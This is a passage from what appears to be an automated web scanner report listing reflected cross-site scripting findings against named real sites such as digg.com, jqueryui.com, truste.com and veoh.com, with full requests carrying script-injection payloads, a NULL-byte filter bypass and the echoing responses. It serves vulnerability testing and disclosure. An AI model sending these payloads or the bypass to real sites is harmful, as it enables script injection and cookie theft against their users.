Date: Thu, 03 Feb 2011 19:45:14 GMT
Server:
Content-Length: 4103

......../1/onResult.......
.C[com.brightcove.templating.ViewerExperienceDTO#analyticsTrackers.publisherType.publisherId.playerKey.version#programmedContent!adTranslationSWF.id.hasProgramming+programmi
...[SNIP]...
,.%.....eAQ~~,AAAADnAS0wE~,ddeyF9dBubzZEABHXI8Tafb593RYf5ad.    ..videoPlayer
sicom.brightcove.player.programming.ProgrammedMediaDTO.mediaId..playerId.componentRefId    type.mediaDTO
.Bdf$5. ....ivideoPlayerf1c31<script>alert(1)</script>9c812db7f39.........
.SOcom.brightcove.catalog.trimmed.VideoDTO.dateFiltered+FLVFullLengthStreamed/SWFVerificationRequired.endDate.FLVFullCodec.linkText.geoRestricted.previewLength.FLVPreviewSize.longDescription.
...[SNIP]...

3.51. http://cbi.boldchat.com/aid/3760177095415339810/bc.cbhs [rdid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cbi.boldchat.com
Path:   /aid/3760177095415339810/bc.cbhs

Issue detail

The value of the rdid request parameter is copied into the HTML document as plain text between tags. The payload 91ccd<script>alert(1)</script>82e43485041 was submitted in the rdid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /aid/3760177095415339810/bc.cbhs?wdid=798708614246318013&rdid=120108381222096822891ccd<script>alert(1)</script>82e43485041 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: cbi.boldchat.com

Response

HTTP/1.1 200 OK
Server: Resin/2.1.17
Cache-Control: no-cache,no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript; charset="UTF-8"
Connection: close
Date: Thu, 03 Feb 2011 19:19:51 GMT
Content-Length: 142

/* An error has occured: java.lang.NumberFormatException: For input string: "120108381222096822891ccd<script>alert(1)</script>82e43485041" */

3.52. http://cbi.boldchat.com/aid/3760177095415339810/bc.cbhs [wdid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cbi.boldchat.com
Path:   /aid/3760177095415339810/bc.cbhs

Issue detail

The value of the wdid request parameter is copied into the HTML document as plain text between tags. The payload 26709<script>alert(1)</script>40fb537d3b1 was submitted in the wdid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /aid/3760177095415339810/bc.cbhs?wdid=79870861424631801326709<script>alert(1)</script>40fb537d3b1&rdid=1201083812220968228 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: cbi.boldchat.com

Response

HTTP/1.1 200 OK
Server: Resin/2.1.17
Cache-Control: no-cache,no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript; charset="UTF-8"
Connection: close
Date: Thu, 03 Feb 2011 19:19:50 GMT
Content-Length: 141

/* An error has occured: java.lang.NumberFormatException: For input string: "79870861424631801326709<script>alert(1)</script>40fb537d3b1" */

3.53. https://cbi.boldchat.com/aid/3760177095415339810/bc.cbhs [rdid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://cbi.boldchat.com
Path:   /aid/3760177095415339810/bc.cbhs

Issue detail

The value of the rdid request parameter is copied into the HTML document as plain text between tags. The payload 5634a<script>alert(1)</script>fed7ed4bbdf was submitted in the rdid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /aid/3760177095415339810/bc.cbhs?wdid=798708614246318013&rdid=1201083812220968228"%3E%3C/script%3E5634a<script>alert(1)</script>fed7ed4bbdf HTTP/1.1
Host: cbi.boldchat.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Resin/2.1.17
Cache-Control: no-cache,no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript; charset="UTF-8"
Date: Thu, 03 Feb 2011 19:47:51 GMT
Content-Length: 153

/* An error has occured: java.lang.NumberFormatException: For input string: "1201083812220968228"></script>5634a<script>alert(1)</script>fed7ed4bbdf" */

3.54. https://cbi.boldchat.com/aid/3760177095415339810/bc.cbhs [wdid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://cbi.boldchat.com
Path:   /aid/3760177095415339810/bc.cbhs

Issue detail

The value of the wdid request parameter is copied into the HTML document as plain text between tags. The payload fe98c<script>alert(1)</script>3b948965da2 was submitted in the wdid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /aid/3760177095415339810/bc.cbhs?wdid=798708614246318013fe98c<script>alert(1)</script>3b948965da2&rdid=1201083812220968228"%3E%3C/script%3E HTTP/1.1
Host: cbi.boldchat.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Resin/2.1.17
Cache-Control: no-cache,no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript; charset="UTF-8"
Date: Thu, 03 Feb 2011 19:47:48 GMT
Content-Length: 141

/* An error has occured: java.lang.NumberFormatException: For input string: "798708614246318013fe98c<script>alert(1)</script>3b948965da2" */

3.55. http://clicktoverify.truste.com/pvr.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clicktoverify.truste.com
Path:   /pvr.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the name of an HTML tag attribute. The payload e483d%20style%3dx%3aexpression(alert(1))%207543349c09e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e483d style=x:expression(alert(1)) 7543349c09e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /pvr.php?page=validate&url=www.supermedia.com&sealid=101bb24b%20style%3dx%3aexpression(alert(document.cookie))%2038cf935/e483d%20style%3dx%3aexpression(alert(1))%207543349c09e101b HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: clicktoverify.truste.com
Cookie: __utma=165058976.885858271.1296786644.1296786644.1296786644.1; __utmb=165058976.1.10.1296786644; __utmc=165058976; __utmz=165058976.1296786644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/28

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 17:56:28 GMT
Server: Apache/2.2.2 (Unix) mod_ssl/2.2.2 OpenSSL/0.9.7a PHP/5.1.4
X-Powered-By: PHP/5.1.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 8431


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" >

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Validation Page for Online Privacy Certification by TRUSTe</title>
<meta nam
...[SNIP]...
<input
           type='hidden' name='sealid' value=101bb24b style=x:expression(alert(document.cookie)) 38cf935/e483d style=x:expression(alert(1)) 7543349c09e101b>
...[SNIP]...

3.56. http://clicktoverify.truste.com/pvr.php [sealid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clicktoverify.truste.com
Path:   /pvr.php

Issue detail

The value of the sealid request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload bb24b%20style%3dx%3aexpression(alert(1))%2038cf935101b was submitted in the sealid parameter. This input was echoed as bb24b style=x:expression(alert(1)) 38cf935101b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /pvr.php?page=validate&url=www.supermedia.com&sealid=101bb24b%20style%3dx%3aexpression(alert(1))%2038cf935101b HTTP/1.1
Host: clicktoverify.truste.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:48:18 GMT
Server: Apache/2.2.2 (Unix) mod_ssl/2.2.2 OpenSSL/0.9.7a PHP/5.1.4
X-Powered-By: PHP/5.1.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 8370


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" >

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Validation Page for Online Privacy Certification by TRUSTe</title>
<meta nam
...[SNIP]...
<input
           type='hidden' name='sealid' value=101bb24b style=x:expression(alert(1)) 38cf935101b>
...[SNIP]...

3.57. http://dean.edwards.name/weblog/2006/03/base/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dean.edwards.name
Path:   /weblog/2006/03/base/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00c6e63"><script>alert(1)</script>ac88b9e9cb was submitted in the REST URL parameter 1. This input was echoed as c6e63"><script>alert(1)</script>ac88b9e9cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /weblog%00c6e63"><script>alert(1)</script>ac88b9e9cb/2006/03/base/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:50:16 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding
Content-Length: 1785
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html>
<head>
<title>/404</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwardsoffline.appspot.com/c
...[SNIP]...
<a href="/weblog%00c6e63"><script>alert(1)</script>ac88b9e9cb/2006/">
...[SNIP]...

3.58. http://dean.edwards.name/weblog/2006/03/base/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://dean.edwards.name
Path:   /weblog/2006/03/base/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload %00f1926<a>d08f4d1b1f6 was submitted in the REST URL parameter 1. This input was echoed as f1926<a>d08f4d1b1f6 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /weblog%00f1926<a>d08f4d1b1f6/2006/03/base/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:50:17 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding
Content-Length: 1643
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html>
<head>
<title>/404</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwardsoffline.appspot.com/c
...[SNIP]...
<a>d08f4d1b1f6/">weblog%00f1926<a>d08f4d1b1f6</a>
...[SNIP]...

3.59. http://dean.edwards.name/weblog/2006/03/base/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://dean.edwards.name
Path:   /weblog/2006/03/base/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 98ff3<a>94fdf96a678 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /weblog/2006/03/base98ff3<a>94fdf96a678/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:50:54 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php
Expires: Thu, 03 Feb 2011 19:50:55 GMT
Last-Modified: Thu, 03 Feb 2011 19:50:55 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1351
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html>
<head>
<title>dean.edwards.name/weblog/</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwards
...[SNIP]...
</a>/base98ff3<a>94fdf96a678/</h1>
...[SNIP]...

3.60. http://dean.edwards.name/weblog/2006/03/base/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dean.edwards.name
Path:   /weblog/2006/03/base/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fae08"><script>alert(1)</script>c1a45a5709b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fae08\"><script>alert(1)</script>c1a45a5709b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weblog/2006/03/base/?fae08"><script>alert(1)</script>c1a45a5709b=1 HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:49:28 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php
Link: <http://dean.edwards.name/weblog/?p=66>; rel=shortlink
Expires: Thu, 03 Feb 2011 19:49:28 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 176151

<!doctype html>
<html>
<head>
<title>Dean Edwards: A Base Class for JavaScript Inheritance</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="styleshe
...[SNIP]...
<form class="contact" action="/weblog/2006/03/base/?fae08\"><script>alert(1)</script>c1a45a5709b=1#preview" method="post">
...[SNIP]...

3.61. http://digg.com/submit [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00a084d"><script>alert(1)</script>ceea5e5408a was submitted in the REST URL parameter 1. This input was echoed as a084d"><script>alert(1)</script>ceea5e5408a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /submit%00a084d"><script>alert(1)</script>ceea5e5408a HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:35:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1458898097449992448%3A180; expires=Fri, 04-Feb-2011 19:35:53 GMT; path=/; domain=digg.com
Set-Cookie: d=f2535ea97972169fa95cf5518bcd78dcc3e70bcad57c10fe678aafc2267b22c0; expires=Wed, 03-Feb-2021 05:43:33 GMT; path=/; domain=.digg.com
X-Digg-Time: D=323639 10.2.128.32
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15618

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%00a084d"><script>alert(1)</script>ceea5e5408a.rss">
...[SNIP]...

3.62. http://ds.addthis.com/red/psi/sites/www.ip-adress.com/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.ip-adress.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 373f2<script>alert(1)</script>e896c8e12b was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.ip-adress.com/p.json?callback=_ate.ad.hpr373f2<script>alert(1)</script>e896c8e12b&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fwww.ip-adress.com%2Fwhois%2Fsmartdevil.com44a08'%253b28a34fbd60c%2Fx22&ref=http%3A%2F%2Fburp%2Fshow%2F36&1l3wvz8 HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh31.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; dt=X; di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296751058.60|1296659685.66; psc=4; uid=4d1ec56b7612a62c

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 326
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Fri, 04 Feb 2011 17:55:25 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sun, 06 Mar 2011 17:55:25 GMT; Path=/
Set-Cookie: di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296842125.60|1296659685.66; Domain=.addthis.com; Expires=Sun, 03-Feb-2013 13:54:01 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Fri, 04 Feb 2011 17:55:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 04 Feb 2011 17:55:25 GMT
Connection: close

_ate.ad.hpr373f2<script>alert(1)</script>e896c8e12b({"urls":["http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4d1ec56b7612a62c&curl=http%3a%2f%2fwww.ip-adress.com%2fwhois%2fsmartdevil.com44a08%27%253b28a34fbd60c%2fx22
...[SNIP]...

3.63. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ad9c"><script>alert(1)</script>ce5a88a8f06 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?2ad9c"><script>alert(1)</script>ce5a88a8f06=1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 03 Feb 2011 22:06:18 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 117121

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&2ad9c"><script>alert(1)</script>ce5a88a8f06=1" type="text/css" media="all" />
...[SNIP]...

3.64. http://ll-appserver.veoh.com/styles/veoh-ie6.css [version parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ll-appserver.veoh.com
Path:   /styles/veoh-ie6.css

Issue detail

The value of the version request parameter is copied into the HTML document as plain text between tags. The payload 714d6<script>alert(1)</script>a1c7f770126 was submitted in the version parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /styles/veoh-ie6.css?version=AFrontend.5.5.4.1038714d6<script>alert(1)</script>a1c7f770126 HTTP/1.1
Host: ll-appserver.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; veohCookie="VisitorUID=F28E893B-ED80-1EAE-894D-FC564C4FF0AB&LastUpdate=03/Feb/2011:12:31:55 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __utmb=91933981.0.10.1296766388;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:06:30 GMT
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sat, 26 Jul 2030 05:00:00 GMT
Vary: Accept-Encoding
Content-Type: text/css; charset: UTF-8
Connection: close

div.spacer{clear:both;line-height:0px;font-size:0px;height:60px}div.smallSpacer{clear:both;line-height:0px;font-size:0px;height:20px}div.tinySpacer{clear:both;line-height:0px;font-size:0px;height:8px}
...[SNIP]...
kenOut
li{border:0;border-right:1px solid #d7d7d7;background:none}#bodyLevelThumbTip_leftOf
.thumbMeta{background:transparent url(../images/hoverdetails_bg_shadow_right.png?version=AFrontend.5.5.4.1038714d6<script>alert(1)</script>a1c7f770126) no-repeat scroll center bottom}#veohPage, #contentHolder_watchFull #playerBottomOuterWrapper,#commentLoginWrapper{background-color:#fff}#contentHolder_watchFull #watch-controls, div.chooseCat ul li a
...[SNIP]...

3.65. http://ll-appserver.veoh.com/styles/veoh.css [version parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ll-appserver.veoh.com
Path:   /styles/veoh.css

Issue detail

The value of the version request parameter is copied into the HTML document as plain text between tags. The payload 88ebc<script>alert(1)</script>9e1cf63d45e was submitted in the version parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /styles/veoh.css?version=AFrontend.5.5.4.103888ebc<script>alert(1)</script>9e1cf63d45e HTTP/1.1
Host: ll-appserver.veoh.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: veohCookie="VisitorUID=F28E893B-ED80-1EAE-894D-FC564C4FF0AB&LastUpdate=03/Feb/2011:12:31:55 -0800&first=0"

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:41:45 GMT
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sat, 26 Jul 2030 05:00:00 GMT
Vary: Accept-Encoding
Content-Type: text/css; charset: UTF-8
Connection: keep-alive
Content-Length: 98344

*{margin:0;padding:0}body{font:normal 12px "Lucida Grande", Tahoma, Arial, Helvetica, sans-serif;text-align:center;margin:0
auto;position:relative}.clear{clear:both;line-height:0px;font-size:0px}.clea
...[SNIP]...
:left;width:250px}.recaptcha_icons{margin-top:3px;float:right}.recaptcha_audio{display:block;width:25px;height:16px;background:transparent url(../images/recaptcha_audio.gif?version=AFrontend.5.5.4.103888ebc<script>alert(1)</script>9e1cf63d45e) no-repeat top center}.recaptcha_text{display:block;width:25px;height:16px;background:transparent url(../images/recaptcha_text.gif?version=AFrontend.5.5.4.103888ebc<script>
...[SNIP]...

3.66. http://managedq.com/search.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://managedq.com
Path:   /search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65f22"%3balert(1)//e219070d6eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 65f22";alert(1)//e219070d6eb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search.php?q=o/65f22"%3balert(1)//e219070d6ebbama HTTP/1.1
Host: managedq.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:32:41 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 13527
Connection: close
Content-Type: text/html


<head>
   <base href="http://managedq.com/">    
<script src="http://www.google.com/jsapi?key=ABQIAAAAfY9R5yZEX7c7fNMc_53H-RSS93VGBhy0VH-F4ConCm_atGP3gxQMWmXfPasKYusJ-dKLng0cAOqm0g" type="text/javascri
...[SNIP]...
r.estimatedResultCount)
//        searcher.cursor.estimatedResultCount
       }

   searchControl.setSearchCompleteCallback(this, OnSearchComplete);
// Execute an inital search
searchControl.execute("o/65f22";alert(1)//e219070d6ebbama");

   //search.gotoPage(3)
//    searchControl.execute("managedq");
}
google.setOnLoadCallback(OnLoad);

//setTimeout("alert(string)",4000)

//]]>
...[SNIP]...

3.67. http://managedq.com/search.php [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://managedq.com
Path:   /search.php

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload be8e1"%3balert(1)//d33907aeb4e was submitted in the q parameter. This input was echoed as be8e1";alert(1)//d33907aeb4e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search.php?q=obamabe8e1"%3balert(1)//d33907aeb4e HTTP/1.1
Host: managedq.com
Accept: */*
Accept-Language: en
